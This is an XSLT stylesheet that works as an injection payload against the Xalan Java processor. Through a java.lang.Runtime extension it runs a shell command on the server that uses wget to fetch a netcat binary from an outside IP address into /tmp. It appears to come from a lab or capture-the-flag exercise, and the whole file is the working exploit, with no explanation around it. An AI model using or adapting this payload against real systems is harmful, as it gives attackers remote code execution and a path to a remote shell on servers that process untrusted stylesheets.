<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:output method="xml" omit-xml-declaration="yes"/>
    <xsl:template match="/"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
    <root>
        <xsl:variable name="cmd"><![CDATA[wget http://10.10.14.209/nc -O /tmp/nc]]></xsl:variable>
        <xsl:variable name="rtObj" select="rt:getRuntime()"/>
        <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
        Process: <xsl:value-of select="$process"/>
        Command: <xsl:value-of select="$cmd"/>
    </root>
</xsl:template>
</xsl:stylesheet>
